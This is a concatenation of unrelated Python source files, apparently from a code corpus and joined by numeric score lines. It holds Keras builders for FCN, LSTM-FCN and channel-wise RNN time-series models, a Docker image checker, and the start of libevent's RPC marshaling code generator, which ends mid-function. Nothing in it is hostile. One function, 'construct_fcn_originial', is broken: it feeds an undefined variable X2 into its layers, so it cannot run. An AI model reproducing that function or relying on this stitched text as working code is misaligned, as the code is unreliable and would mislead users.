def construct_fcn(input_dimension, output_dimension, dropout=0.5,
model_name=""):
"""Construct an FCN model for multivariate time series classification
(Karim et al. 2019 - Multivariate LSTM-FCNs for time series classification)
Args:
input_dimension (int): Input dimension of the model
output_dimension (int): Output dimension of the model
dropout (float): Amount of dropout to apply in the first two
convolutional blocks
model_name (str): Name of the model
Returns:
model (tf.keras.Model): Constructed CN model
"""
inputs = Input(shape=(None, input_dimension))
mask = Masking().compute_mask(inputs)
X = Conv1D(128, 8, padding='same',
kernel_initializer='he_uniform')(inputs)
X = Activation('relu')(X)
X = BatchNormalization()(X)
X = SpatialDropout1D(dropout)(X)
X = ApplyMask()(X, mask)
X = squeeze_excite_block(X, mask)
X = Conv1D(256, 5, padding='same', kernel_initializer='he_uniform')(X)
X = Activation('relu')(X)
X = BatchNormalization()(X)
X = SpatialDropout1D(dropout)(X)
X = ApplyMask()(X, mask)
X = squeeze_excite_block(X, mask)
X = Conv1D(128, 3, padding='same', kernel_initializer='he_uniform')(X)
X = Activation('relu')(X)
X = BatchNormalization()(X)
X = GlobalAveragePooling1D()(X, mask)
if output_dimension != 1:
# Classification
outputs = Dense(units=output_dimension, activation='softmax')(X)
else:
# Regression
outputs = Dense(units=output_dimension)(X)
model = Model(inputs=inputs, outputs=outputs, name=model_name)
return model
def construct_fcn_originial(input_dimension, output_dimension, model_name=""):
"""Construct an FCN model for multivariate time series classification
(Karim et al. 2019 - Multivariate LSTM-FCNs for time series classification)
Args:
input_dimension (int): Input dimension of the model
output_dimension (int): Output dimension of the model
model_name (str): Name of the model
Returns:
model (tf.keras.Model): Constructed CN model
"""
inputs = Input(shape=(None, input_dimension))
X = Conv1D(128, 8, padding='same',
kernel_initializer='he_uniform')(inputs)
X = BatchNormalization()(X2)
X = Activation('relu')(X2)
X = Conv1D(256, 5, padding='same', kernel_initializer='he_uniform')(X2)
X = BatchNormalization()(X2)
X = Activation('relu')(X2)
X = Conv1D(128, 3, padding='same', kernel_initializer='he_uniform')(X2)
X = BatchNormalization()(X2)
X = Activation('relu')(X2)
X = GlobalAveragePooling1D()(X2)
if output_dimension != 1:
# Classification
outputs = Dense(units=output_dimension, activation='softmax')(X)
else:
# Regression
outputs = Dense(units=output_dimension)(X)
model = Model(inputs=inputs, outputs=outputs, name=model_name)
return model
def construct_lstm_fcn_original(input_dimension, output_dimension, dropout=0.8,
hid_dimension_lstm=8, model_name=""):
"""Construct an LSTM-FCN model
Architecture as described in:
Karim et al. 2019 - Multivariate LSTM-FCNs for time series classification
Args:
input_dimension (int): Input dimension of the model
output_dimension (int): Output dimension of the model
dropout (float): Amount of dropout to apply after the LSTM cell
hid_dimension (int): Dimension of the hidden layer (i.e. # of unit in
the RNN cell)
model_name (str): Name of the model
Returns:
model (tf.keras.Model): Constructed LSTM-FCN model
"""
inputs = Input(shape=(None, input_dimension))
X1 = Masking()(inputs)
X1 = LSTM(hid_dimension_lstm)(X1)
X1 = Dropout(dropout)(X1)
X2 = Conv1D(128, 8, padding='same',
kernel_initializer='he_uniform')(inputs)
X2 = BatchNormalization()(X2)
X2 = Activation('relu')(X2)
X2 = squeeze_excite_block(X2)
X2 = Conv1D(256, 5, padding='same', kernel_initializer='he_uniform')(X2)
X2 = BatchNormalization()(X2)
X2 = Activation('relu')(X2)
X2 = squeeze_excite_block(X2)
X2 = Conv1D(128, 3, padding='same', kernel_initializer='he_uniform')(X2)
X2 = BatchNormalization()(X2)
X2 = Activation('relu')(X2)
X2 = GlobalAveragePooling1D()(X2)
X = concatenate([X1, X2])
if output_dimension != 1:
# Classification
outputs = Dense(units=output_dimension, activation='softmax')(X)
else:
# Regression
outputs = Dense(units=output_dimension)(X)
model = Model(inputs=inputs, outputs=outputs, name=model_name)
return model
def construct_lstm_fcn(input_dimension, output_dimension, dropout=0.5,
        hid_dimension_lstm=16, model_name=""):
    """Build a (modified) LSTM-FCN model.

    Modified architecture:
     - Perform batch normalization after ReLU activation
     - Use SpatialDropout1D in the convolutional blocks to reduce overfitting

    Args:
        input_dimension (int): Input dimension of the model
        output_dimension (int): Output dimension of the model
        dropout (float): Amount of dropout to apply after the LSTM cell
        hid_dimension_lstm (int): Number of units in the LSTM cell
        model_name (str): Name of the model

    Returns:
        model (tf.keras.Model): Constructed LSTM-FCN model
    """
    inputs = Input(shape=(None, input_dimension))
    # Padding mask, re-applied after every convolutional block below.
    mask = Masking().compute_mask(inputs)

    # Recurrent branch.
    rnn_branch = Masking()(inputs)
    rnn_branch = LSTM(hid_dimension_lstm)(rnn_branch)
    rnn_branch = Dropout(dropout)(rnn_branch)

    # Convolutional branch; the first two blocks add spatial dropout,
    # re-masking and squeeze-and-excite.
    conv_branch = inputs
    for n_filters, kernel_size in ((128, 8), (256, 5)):
        conv_branch = Conv1D(n_filters, kernel_size, padding='same',
                             kernel_initializer='he_uniform')(conv_branch)
        conv_branch = Activation('relu')(conv_branch)
        conv_branch = BatchNormalization()(conv_branch)
        conv_branch = SpatialDropout1D(0.5)(conv_branch)
        conv_branch = ApplyMask()(conv_branch, mask)
        conv_branch = squeeze_excite_block(conv_branch, mask)
    conv_branch = Conv1D(128, 3, padding='same',
                         kernel_initializer='he_uniform')(conv_branch)
    conv_branch = Activation('relu')(conv_branch)
    conv_branch = BatchNormalization()(conv_branch)
    conv_branch = GlobalAveragePooling1D()(conv_branch, mask)

    X = concatenate([rnn_branch, conv_branch])
    if output_dimension != 1:
        # Classification head
        outputs = Dense(units=output_dimension, activation='softmax')(X)
    else:
        # Regression head
        outputs = Dense(units=output_dimension)(X)
    return Model(inputs=inputs, outputs=outputs, name=model_name)
def construct_channel_wise_rnn(input_dimension, output_dimension,
        model_type='lstm_cw', dropout=0.0, global_dropout=0.0, hid_dimension=16,
        multiplier=4, model_name=""):
    """Construct a channel-wise RNN model (either LSTM or GRU)

    The first half of the input channels carry the data and the second half
    the corresponding mask channels; one bidirectional LSTM is trained per
    (data, mask) channel pair before a global RNN combines their outputs.

    Args:
        model_type (str): Either 'lstm_cw' or 'gru_cw'
        input_dimension (int): Input dimension of the model
        output_dimension (int): Output dimension of the model
        dropout (float): Amount of dropout to apply after each RNN cell
        global_dropout (float): Amount of dropout to apply before the output
        hid_dimension (int): Dimension of the hidden layer (i.e. # of unit in
            the RNN cell)
        multiplier (int): Multiplier for the hidden dimension of the global
            RNN
        model_name (str): Name of the model

    Returns:
        model (tf.keras.Model): Constructed channel-wise RNN model

    Raises:
        ValueError: If *model_type* is not one of 'lstm_cw' or 'gru_cw'
    """
    inputs = Input(shape=(None, input_dimension))

    # Skip timestep if all values of the input tensor are 0
    mask = Masking().compute_mask(inputs)
    X = Masking()(inputs)

    # Train a bidirectional LSTM per (data, mask) channel pair, and
    # collect their sequence outputs.
    # Integer division replaces the original int(x / 2): identical result
    # for non-negative ints, without a float round-trip.
    n_channels = input_dimension // 2
    cXs = []
    for feature in range(n_channels):
        mask_var = feature + n_channels
        channel_slice = Slice(feature, mask_var)(X)
        num_hid_units = hid_dimension // 2
        cell = LSTM(units=num_hid_units, activation='tanh',
            return_sequences=True, recurrent_dropout=dropout,
            dropout=dropout)
        cX = Bidirectional(cell)(channel_slice)
        cX = ApplyMask()(cX, mask)
        cXs.append(cX)

    # Concatenate the per-channel outputs along the feature axis.
    X = concatenate(cXs, axis=2)
    X = Masking()(X)

    # There always has to be at least one global RNN cell.
    if model_type == 'lstm_cw':
        X = LSTM(activation='tanh', dropout=dropout, recurrent_dropout=0.0,
            return_sequences=False, units=multiplier*hid_dimension)(X)
    elif model_type == 'gru_cw':
        X = GRU(activation='tanh', dropout=dropout, recurrent_dropout=0.0,
            return_sequences=False, units=multiplier*hid_dimension)(X)
    else:
        raise ValueError("Parameter 'model_type' should be one of " +
            "'lstm_cw' or 'gru_cw'.")

    if global_dropout:
        X = Dropout(global_dropout)(X)

    if output_dimension != 1:
        # Classification
        outputs = Dense(units=output_dimension, activation='softmax')(X)
    else:
        # Regression
        outputs = Dense(units=output_dimension)(X)
    model = Model(inputs=inputs, outputs=outputs, name=model_name)
    return model
def construct_and_compile_model(model_type, model_name, task, checkpoint_file,
        checkpoints_dir, model_params=None):
    """Construct and compile a model of a specific type

    Args:
        model_type (str): The type of model to be constructed; one of
            'lstm', 'gru', 'lstm_cw', 'gru_cw', 'fcn' or 'lstm_fcn'
        model_name (str): The name of model to be constructed
        task (str): Either 'regression' or 'classification'
        checkpoint_file (str): Name of a checkpoint file; falsy to start
            from scratch
        checkpoints_dir (str): Path to the checkpoints directory
        model_params (dict): Hyper-parameters for the model to be
            constructed; must contain the keys 'n_cells',
            'input_dimension', 'output_dimension', 'dropout',
            'global_dropout', 'hidden_dimension' and 'multiplier'

    Returns:
        model (tf.keras.Model): Constructed and compiled model

    Raises:
        ValueError: If *task* or *model_type* is not supported
        KeyError: If a required key is missing from *model_params*
    """
    # Avoid a shared mutable default argument; an explicit empty dict
    # still fails below with the same KeyError as the old `={}` default.
    if model_params is None:
        model_params = {}
    n_cells = model_params['n_cells']
    input_dimension = model_params['input_dimension']
    output_dimension = model_params['output_dimension']
    dropout = model_params['dropout']
    global_dropout = model_params['global_dropout']
    hid_dimension = model_params['hidden_dimension']
    multiplier = model_params['multiplier']

    if task == 'classification':
        loss_fn = SparseCategoricalCrossentropy()
        metrics = ['accuracy']
    elif task == 'regression':
        loss_fn = MeanAbsoluteError()
        metrics = ['mse']
        # Regression always predicts a single scalar.
        output_dimension = 1
    else:
        raise ValueError('Argument "task" must be one of "classification" ' \
            'or "regression"')

    if model_type == 'lstm' or model_type == 'gru':
        model = construct_rnn(input_dimension, output_dimension, model_type,
            n_cells, dropout, hid_dimension, model_name)
    elif model_type == 'lstm_cw' or model_type == 'gru_cw':
        model = construct_channel_wise_rnn(input_dimension, output_dimension,
            model_type, dropout, global_dropout, hid_dimension, multiplier,
            model_name)
    elif model_type == 'fcn':
        model = construct_fcn(input_dimension, output_dimension, dropout,
            model_name)
    elif model_type == 'lstm_fcn':
        model = construct_lstm_fcn(input_dimension, output_dimension, dropout,
            hid_dimension, model_name)
    else:
        raise ValueError(f'Model type {model_type} is not supported.')

    if checkpoint_file:
        print(f"=> Loading weights from checkpoint: {checkpoint_file}")
        model.load_weights(os.path.join(checkpoints_dir, checkpoint_file))

    model.compile(optimizer=Adam(), loss=loss_fn, metrics=metrics)
    model.summary()

    return model
class MetricsCallback(Callback):
    """Keras callback that prints detailed evaluation reports per epoch.

    After every epoch the model is run over a bounded number of batches of
    the training and validation sets and the task-appropriate report is
    printed.
    """

    def __init__(self, model, task, training_data, validation_data,
            training_steps, validation_steps):
        """Callback to compute metrics after an epoch has ended

        Args:
            model (tf.keras.model): TensorFlow (Keras) model
            task (str): Classification or regression
            training_data (tf.data.Dataset)
            validation_data (tf.data.Dataset)
            training_steps (int)
            validation_steps (int)
        """
        # Initialize the Callback base class before overriding attributes.
        super().__init__()
        self.model = model
        self.task = task
        self.training_data = training_data
        self.validation_data = validation_data
        self.training_steps = training_steps
        self.validation_steps = validation_steps

    def _report(self, dataset, steps):
        """Predict on *dataset* and print the evaluation for the task.

        Shared by the training and validation passes of `on_epoch_end`.
        """
        y_true, y_pred = [], []
        for batch, (x, y) in enumerate(dataset):
            # NOTE(review): '>' preserves the original behavior of
            # evaluating steps + 1 batches; confirm whether '>=' was meant.
            if batch > steps:
                break
            if self.task == 'classification':
                y_pred.append(np.argmax(self.model.predict_on_batch(x), axis=1))
            else:
                y_pred.append(self.model.predict_on_batch(x))
            y_true.append(y.numpy())
        if self.task == 'classification':
            evaluate_classification_model(np.concatenate(y_true, axis=0),
                np.concatenate(y_pred, axis=0))
        else:
            evaluate_regression_model(np.concatenate(y_true, axis=0),
                np.concatenate(y_pred, axis=0))

    def on_epoch_end(self, epoch, logs=None):
        """The callback

        Args:
            epoch (int): Identifier of the current epoch
        """
        print('\n=> Predict on training data:\n')
        self._report(self.training_data, self.training_steps)

        print('\n=> Predict on validation data:\n')
        self._report(self.validation_data, self.validation_steps)
| 2.796875 | 3 |
# nightcapcore/nightcapcore/docker/docker_checker.py
# Copyright 2020 by <NAME>.
# All rights reserved.
# This file is part of the Nightcap Project,
# and is released under the "MIT License Agreement". Please see the LICENSE
# file that should have been included as part of this package.
# region Imports
import docker as dDocker
import os
from nightcapcore.printers.print import Printer
DEVNULL = open(os.devnull, "wb")
# endregion
class NightcapCoreDockerChecker(object):
    """
    This class is used to check the local Docker environment for the
    images the project depends on

    ...

    Attributes
    ----------
        mongo_im_exists:
            The local mongo:latest image object if present, otherwise False

        ncs_exits:
            The local nightcapsite:latest image object if present,
            otherwise False

    Methods
    -------
        Accessible
        -------
            pull_image(self, image: str): -> None
                pulls the docker image passed

        None Accessible
        -------
            __check_image(self, image: str, tag: str):
                returns the local image object, or False if it is missing

            _check_setup(self): -> None
                reports whether the required images have been pulled
    """

    # region Init
    def __init__(self) -> None:
        super().__init__()
        self.printer = Printer()
        self.docker = dDocker.from_env()
        # Truthy (the image object) when present locally, False otherwise.
        self.mongo_im_exists = self.__check_image("mongo", "latest")
        self.ncs_exits = self.__check_image("nightcapsite", "latest")

    # endregion

    # region Check Image
    def __check_image(self, image: str, tag: str):
        """Return the local image object for ``image:tag`` or False.

        The unused ``grep`` parameter of the original signature was removed;
        the method is private, so only the calls above were affected.
        """
        try:
            return self.docker.images.get(image + ":" + tag)
        except Exception:
            # Any lookup failure (most commonly ImageNotFound) means the
            # image is not available locally.
            return False

    # endregion

    # region Check Set-up
    def _check_setup(self):
        """Report required images that still have to be pulled."""
        if not self.mongo_im_exists:
            print("install mongo")

    # endregion

    # region Pull Image
    def pull_image(self, image: str) -> None:
        """Pull *image* from the registry, reporting and re-raising errors."""
        try:
            self.docker.images.pull(image)
        except Exception:
            self.printer.print_error(Exception("Error pulling image: " + image))
            # Re-raise with the original traceback intact.
            raise

    # endregion
| 2.4375 | 2 |
#!/usr/bin/env python
#
# Copyright (c) 2005-2007 <NAME> <<EMAIL>>
# Copyright (c) 2007-2012 <NAME> and <NAME>
# All rights reserved.
#
# Generates marshaling code based on libevent.
# pylint: disable=too-many-lines
# pylint: disable=too-many-branches
# pylint: disable=too-many-public-methods
# pylint: disable=too-many-statements
# pylint: disable=global-statement
# TODO:
# 1) propagate the arguments/options parsed by argparse down to the
# instantiated factory objects.
# 2) move the globals into a class that manages execution, including the
# progress outputs that go to stderr at the moment.
# 3) emit other languages.
import argparse
import re
import sys
_NAME = "event_rpcgen.py"
_VERSION = "0.1"

# Globals
# Current input line number, used for error reporting.
LINE_COUNT = 0

# Pre-compiled regular expressions used while parsing the .rpc input.
CPPCOMMENT_RE = re.compile(r"\/\/.*$")
NONIDENT_RE = re.compile(r"\W")
PREPROCESSOR_DEF_RE = re.compile(r"^#define")
STRUCT_REF_RE = re.compile(r"^struct\[(?P<name>[a-zA-Z_][a-zA-Z0-9_]*)\]$")
STRUCT_DEF_RE = re.compile(r"^struct +[a-zA-Z_][a-zA-Z0-9_]* *{$")
WHITESPACE_RE = re.compile(r"\s+")

# Verbatim pass-through lines destined for the generated .h / .c files.
HEADER_DIRECT = []
CPP_DIRECT = []

# When True, declare() suppresses its progress output.
QUIETLY = False
def declare(s):
    """Print the progress message *s* unless quiet mode is enabled."""
    if QUIETLY:
        return
    print(s)
def TranslateList(mylist, mydict):
    """Return a copy of *mylist* with each entry %-formatted via *mydict*."""
    return [template % mydict for template in mylist]
class RpcGenError(Exception):
    """An Exception class for parse errors."""

    def __init__(self, why):
        # Initialize the Exception base class properly instead of
        # suppressing pylint's super-init-not-called; args/str/pickling
        # now follow the standard Exception contract.
        super(RpcGenError, self).__init__(why)
        self.why = why

    def __str__(self):
        return str(self.why)
# Holds everything that makes a struct
class Struct(object):
    """Collects the entries of one parsed struct definition.

    Entries are kept in declaration order; every entry must carry a tag
    number unique within the struct.
    """

    def __init__(self, name):
        self._name = name
        self._entries = []
        self._tags = {}

        declare("  Created struct: %s" % name)

    def AddEntry(self, entry):
        """Append *entry*, rejecting duplicate tag numbers."""
        tag = entry.Tag()
        if tag in self._tags:
            raise RpcGenError(
                'Entry "%s" duplicates tag number %d from "%s" '
                "around line %d"
                % (entry.Name(), tag, self._tags[tag], LINE_COUNT)
            )
        self._entries.append(entry)
        self._tags[tag] = entry.Name()

        declare("    Added entry: %s" % entry.Name())

    def Name(self):
        """Return the struct's name."""
        return self._name

    def EntryTagName(self, entry):
        """Creates the name inside an enumeration for distinguishing data
        types."""
        return ("%s_%s" % (self._name, entry.Name())).upper()

    @staticmethod
    def PrintIndented(filep, ident, code):
        """Takes an array, add indentation to each entry and prints it."""
        for line in code:
            filep.write("%s%s\n" % (ident, line))
class StructCCode(Struct):
    """ Knows how to generate C code for a struct """

    def __init__(self, name):
        Struct.__init__(self, name)

    def PrintTags(self, filep):
        """Prints the tag definitions for a structure."""
        filep.write("/* Tag definition for %s */\n" % self._name)
        filep.write("enum %s_ {\n" % self._name.lower())
        for entry in self._entries:
            filep.write("  %s=%d,\n" % (self.EntryTagName(entry), entry.Tag()))
        filep.write("  %s_MAX_TAGS\n" % (self._name.upper()))
        filep.write("};\n\n")

    def PrintForwardDeclaration(self, filep):
        """Emit the forward declaration of the C struct."""
        filep.write("struct %s;\n" % self._name)

    def PrintDeclaration(self, filep):
        """Emit the struct declaration, its accessor vtable and the
        prototypes of all generated functions."""
        filep.write("/* Structure declaration for %s */\n" % self._name)
        filep.write("struct %s_access_ {\n" % self._name)
        for entry in self._entries:
            dcl = entry.AssignDeclaration("(*%s_assign)" % entry.Name())
            dcl.extend(entry.GetDeclaration("(*%s_get)" % entry.Name()))
            if entry.Array():
                dcl.extend(entry.AddDeclaration("(*%s_add)" % entry.Name()))
            self.PrintIndented(filep, "  ", dcl)
        filep.write("};\n\n")

        filep.write("struct %s {\n" % self._name)
        filep.write("  struct %s_access_ *base;\n\n" % self._name)
        for entry in self._entries:
            dcl = entry.Declaration()
            self.PrintIndented(filep, "  ", dcl)
        filep.write("\n")
        for entry in self._entries:
            # One _set flag per entry records whether it has been assigned.
            filep.write("  ev_uint8_t %s_set;\n" % entry.Name())
        filep.write("};\n\n")

        filep.write(
            """struct %(name)s *%(name)s_new(void);
struct %(name)s *%(name)s_new_with_arg(void *);
void %(name)s_free(struct %(name)s *);
void %(name)s_clear(struct %(name)s *);
void %(name)s_marshal(struct evbuffer *, const struct %(name)s *);
int %(name)s_unmarshal(struct %(name)s *, struct evbuffer *);
int %(name)s_complete(struct %(name)s *);
void evtag_marshal_%(name)s(struct evbuffer *, ev_uint32_t,
    const struct %(name)s *);
int evtag_unmarshal_%(name)s(struct evbuffer *, ev_uint32_t,
    struct %(name)s *);\n"""
            % {"name": self._name}
        )

        # Write a setting function of every variable
        for entry in self._entries:
            self.PrintIndented(
                filep, "", entry.AssignDeclaration(entry.AssignFuncName())
            )
            self.PrintIndented(filep, "", entry.GetDeclaration(entry.GetFuncName()))
            if entry.Array():
                self.PrintIndented(filep, "", entry.AddDeclaration(entry.AddFuncName()))

        filep.write("/* --- %s done --- */\n\n" % self._name)

    def PrintCode(self, filep):
        """Emit the full C implementation of the struct: constructors,
        accessors, clear/free, (un)marshaling and completeness checks."""
        filep.write(
            """/*
 * Implementation of %s
 */

"""
            % (self._name)
        )

        filep.write(
            """
static struct %(name)s_access_ %(name)s_base__ = {
"""
            % {"name": self._name}
        )
        for entry in self._entries:
            self.PrintIndented(filep, "  ", entry.CodeBase())
        filep.write("};\n\n")

        # Creation
        filep.write(
            """struct %(name)s *
%(name)s_new(void)
{
  return %(name)s_new_with_arg(NULL);
}

struct %(name)s *
%(name)s_new_with_arg(void *unused)
{
  struct %(name)s *tmp;
  if ((tmp = malloc(sizeof(struct %(name)s))) == NULL) {
    event_warn("%%s: malloc", __func__);
    return (NULL);
  }
  tmp->base = &%(name)s_base__;

"""
            % {"name": self._name}
        )

        for entry in self._entries:
            self.PrintIndented(filep, "  ", entry.CodeInitialize("tmp"))
            filep.write("  tmp->%s_set = 0;\n\n" % entry.Name())

        filep.write(
            """  return (tmp);
}

"""
        )

        # Adding
        for entry in self._entries:
            if entry.Array():
                self.PrintIndented(filep, "", entry.CodeAdd())
            filep.write("\n")

        # Assigning
        for entry in self._entries:
            self.PrintIndented(filep, "", entry.CodeAssign())
            filep.write("\n")

        # Getting
        for entry in self._entries:
            self.PrintIndented(filep, "", entry.CodeGet())
            filep.write("\n")

        # Clearing
        filep.write(
            """void
%(name)s_clear(struct %(name)s *tmp)
{
"""
            % {"name": self._name}
        )
        for entry in self._entries:
            self.PrintIndented(filep, "  ", entry.CodeClear("tmp"))

        filep.write("}\n\n")

        # Freeing
        filep.write(
            """void
%(name)s_free(struct %(name)s *tmp)
{
"""
            % {"name": self._name}
        )

        for entry in self._entries:
            self.PrintIndented(filep, "  ", entry.CodeFree("tmp"))

        filep.write(
            """  free(tmp);
}

"""
        )

        # Marshaling
        filep.write(
            """void
%(name)s_marshal(struct evbuffer *evbuf, const struct %(name)s *tmp) {
"""
            % {"name": self._name}
        )
        for entry in self._entries:
            indent = "  "
            # Optional entries do not have to be set
            if entry.Optional():
                indent += "  "
                filep.write("  if (tmp->%s_set) {\n" % entry.Name())
            self.PrintIndented(
                filep,
                indent,
                entry.CodeMarshal(
                    "evbuf",
                    self.EntryTagName(entry),
                    entry.GetVarName("tmp"),
                    entry.GetVarLen("tmp"),
                ),
            )
            if entry.Optional():
                filep.write("  }\n")

        filep.write("}\n\n")

        # Unmarshaling
        filep.write(
            """int
%(name)s_unmarshal(struct %(name)s *tmp, struct evbuffer *evbuf)
{
  ev_uint32_t tag;
  while (evbuffer_get_length(evbuf) > 0) {
    if (evtag_peek(evbuf, &tag) == -1)
      return (-1);
    switch (tag) {

"""
            % {"name": self._name}
        )
        for entry in self._entries:
            filep.write("      case %s:\n" % (self.EntryTagName(entry)))
            if not entry.Array():
                # Non-array entries may appear at most once on the wire.
                filep.write(
                    """        if (tmp->%s_set)
          return (-1);
"""
                    % (entry.Name())
                )

            self.PrintIndented(
                filep,
                "        ",
                entry.CodeUnmarshal(
                    "evbuf",
                    self.EntryTagName(entry),
                    entry.GetVarName("tmp"),
                    entry.GetVarLen("tmp"),
                ),
            )

            filep.write(
                """        tmp->%s_set = 1;
        break;
"""
                % (entry.Name())
            )
        filep.write(
            """      default:
        return -1;
    }
  }

"""
        )
        # Check if it was decoded completely
        filep.write(
            """  if (%(name)s_complete(tmp) == -1)
    return (-1);
  return (0);
}
"""
            % {"name": self._name}
        )

        # Checking if a structure has all the required data
        filep.write(
            """
int
%(name)s_complete(struct %(name)s *msg)
{
"""
            % {"name": self._name}
        )
        for entry in self._entries:
            if not entry.Optional():
                code = [
                    """if (!msg->%(name)s_set)
  return (-1);"""
                ]
                code = TranslateList(code, entry.GetTranslation())
                self.PrintIndented(filep, "  ", code)

            self.PrintIndented(
                filep, "  ", entry.CodeComplete("msg", entry.GetVarName("msg"))
            )
        filep.write(
            """  return (0);
}
"""
        )

        # Complete message unmarshaling
        filep.write(
            """
int
evtag_unmarshal_%(name)s(struct evbuffer *evbuf, ev_uint32_t need_tag,
    struct %(name)s *msg)
{
  ev_uint32_t tag;
  int res = -1;

  struct evbuffer *tmp = evbuffer_new();

  if (evtag_unmarshal(evbuf, &tag, tmp) == -1 || tag != need_tag)
    goto error;

  if (%(name)s_unmarshal(msg, tmp) == -1)
    goto error;

  res = 0;

 error:
  evbuffer_free(tmp);
  return (res);
}
"""
            % {"name": self._name}
        )

        # Complete message marshaling
        filep.write(
            """
void
evtag_marshal_%(name)s(struct evbuffer *evbuf, ev_uint32_t tag,
    const struct %(name)s *msg)
{
  struct evbuffer *buf_ = evbuffer_new();
  assert(buf_ != NULL);

  %(name)s_marshal(buf_, msg);
  evtag_marshal_buffer(evbuf, tag, buf_);
  evbuffer_free(buf_);
}
"""
            % {"name": self._name}
        )
class Entry(object):
    """Base class for one field of an rpc struct.

    Tracks the field's wire tag, name and optional/array flags, and emits
    the generic C accessor code shared by the scalar entry types;
    subclasses override the type-specific pieces.
    """

    def __init__(self, ent_type, name, tag):
        self._type = ent_type
        self._name = name
        self._tag = int(tag)
        self._ctype = ent_type
        self._optional = False
        self._can_be_array = False
        self._array = False
        self._line_count = -1
        self._struct = None
        self._refname = None

        # Control how an optional value is passed in generated signatures.
        self._optpointer = True
        self._optaddarg = True

    @staticmethod
    def GetInitializer():
        raise NotImplementedError("Entry does not provide an initializer")

    def SetStruct(self, struct):
        self._struct = struct

    def LineCount(self):
        # SetLineCount must have been called first.
        assert self._line_count != -1
        return self._line_count

    def SetLineCount(self, number):
        self._line_count = number

    def Array(self):
        return self._array

    def Optional(self):
        return self._optional

    def Tag(self):
        return self._tag

    def Name(self):
        return self._name

    def Type(self):
        return self._type

    def MakeArray(self):
        self._array = True

    def MakeOptional(self):
        self._optional = True

    def Verify(self):
        """Raise RpcGenError if the entry's flags are inconsistent."""
        if self.Array() and not self._can_be_array:
            raise RpcGenError(
                'Entry "%s" cannot be created as an array '
                "around line %d" % (self._name, self.LineCount())
            )
        if not self._struct:
            raise RpcGenError(
                'Entry "%s" does not know which struct it belongs to '
                "around line %d" % (self._name, self.LineCount())
            )
        if self._optional and self._array:
            raise RpcGenError(
                'Entry "%s" has illegal combination of optional and array '
                "around line %d" % (self._name, self.LineCount())
            )

    def GetTranslation(self, extradict=None):
        """Return the %-format mapping used by the C code templates."""
        if extradict is None:
            extradict = {}
        mapping = {
            "parent_name": self._struct.Name(),
            "name": self._name,
            "ctype": self._ctype,
            "refname": self._refname,
            "optpointer": self._optpointer and "*" or "",
            "optreference": self._optpointer and "&" or "",
            "optaddarg": self._optaddarg and ", const %s value" % self._ctype or "",
        }
        for (k, v) in list(extradict.items()):
            mapping[k] = v

        return mapping

    def GetVarName(self, var):
        """C expression naming this entry's data member inside *var*."""
        return "%(var)s->%(name)s_data" % self.GetTranslation({"var": var})

    def GetVarLen(self, _var):
        """C expression for the marshaled length of this entry."""
        return "sizeof(%s)" % self._ctype

    def GetFuncName(self):
        return "%s_%s_get" % (self._struct.Name(), self._name)

    def GetDeclaration(self, funcname):
        """Prototype of the generated getter."""
        code = [
            "int %s(struct %s *, %s *);" % (funcname, self._struct.Name(), self._ctype)
        ]
        return code

    def CodeGet(self):
        """C body of the generated getter."""
        code = """int
%(parent_name)s_%(name)s_get(struct %(parent_name)s *msg, %(ctype)s *value)
{
  if (msg->%(name)s_set != 1)
    return (-1);
  *value = msg->%(name)s_data;
  return (0);
}"""
        code = code % self.GetTranslation()
        return code.split("\n")

    def AssignFuncName(self):
        return "%s_%s_assign" % (self._struct.Name(), self._name)

    def AddFuncName(self):
        return "%s_%s_add" % (self._struct.Name(), self._name)

    def AssignDeclaration(self, funcname):
        """Prototype of the generated setter."""
        code = [
            "int %s(struct %s *, const %s);"
            % (funcname, self._struct.Name(), self._ctype)
        ]
        return code

    def CodeAssign(self):
        """C body of the generated setter."""
        code = [
            "int",
            "%(parent_name)s_%(name)s_assign(struct %(parent_name)s *msg,"
            " const %(ctype)s value)",
            "{",
            "  msg->%(name)s_set = 1;",
            "  msg->%(name)s_data = value;",
            "  return (0);",
            "}",
        ]
        code = "\n".join(code)
        code = code % self.GetTranslation()
        return code.split("\n")

    def CodeClear(self, structname):
        """C code resetting this entry's _set flag."""
        code = ["%s->%s_set = 0;" % (structname, self.Name())]

        return code

    @staticmethod
    def CodeComplete(_structname, _var_name):
        # Scalar entries need no extra completeness check.
        return []

    @staticmethod
    def CodeFree(_name):
        # Scalar entries own no heap memory.
        return []

    def CodeBase(self):
        """Accessor-table initializer lines for this entry."""
        code = ["%(parent_name)s_%(name)s_assign,", "%(parent_name)s_%(name)s_get,"]
        if self.Array():
            code.append("%(parent_name)s_%(name)s_add,")

        code = "\n".join(code)
        code = code % self.GetTranslation()
        return code.split("\n")
class EntryBytes(Entry):
    """Fixed-length byte-array entry (C type ev_uint8_t[length])."""

    def __init__(self, ent_type, name, tag, length):
        # Init base class
        super(EntryBytes, self).__init__(ent_type, name, tag)

        self._length = length
        self._ctype = "ev_uint8_t"

    @staticmethod
    def GetInitializer():
        return "NULL"

    def GetVarLen(self, _var):
        # The length is fixed at declaration time.
        return "(%s)" % self._length

    @staticmethod
    def CodeArrayAdd(varname, _value):
        # XXX: copy here
        return ["%(varname)s = NULL;" % {"varname": varname}]

    def GetDeclaration(self, funcname):
        # The getter hands out a pointer to the fixed-size array.
        code = [
            "int %s(struct %s *, %s **);" % (funcname, self._struct.Name(), self._ctype)
        ]
        return code

    def AssignDeclaration(self, funcname):
        code = [
            "int %s(struct %s *, const %s *);"
            % (funcname, self._struct.Name(), self._ctype)
        ]
        return code

    def Declaration(self):
        dcl = ["ev_uint8_t %s_data[%s];" % (self._name, self._length)]

        return dcl

    def CodeGet(self):
        """C body of the getter for a fixed-length byte array."""
        name = self._name
        code = [
            "int",
            "%s_%s_get(struct %s *msg, %s **value)"
            % (self._struct.Name(), name, self._struct.Name(), self._ctype),
            "{",
            "  if (msg->%s_set != 1)" % name,
            "    return (-1);",
            "  *value = msg->%s_data;" % name,
            "  return (0);",
            "}",
        ]
        return code

    def CodeAssign(self):
        """C body of the setter; copies exactly _length bytes."""
        name = self._name
        code = [
            "int",
            "%s_%s_assign(struct %s *msg, const %s *value)"
            % (self._struct.Name(), name, self._struct.Name(), self._ctype),
            "{",
            "  msg->%s_set = 1;" % name,
            "  memcpy(msg->%s_data, value, %s);" % (name, self._length),
            "  return (0);",
            "}",
        ]
        return code

    def CodeUnmarshal(self, buf, tag_name, var_name, var_len):
        code = [
            "if (evtag_unmarshal_fixed(%(buf)s, %(tag)s, "
            "%(var)s, %(varlen)s) == -1) {",
            '  event_warnx("%%s: failed to unmarshal %(name)s", __func__);',
            "  return (-1);",
            "}",
        ]
        return TranslateList(
            code,
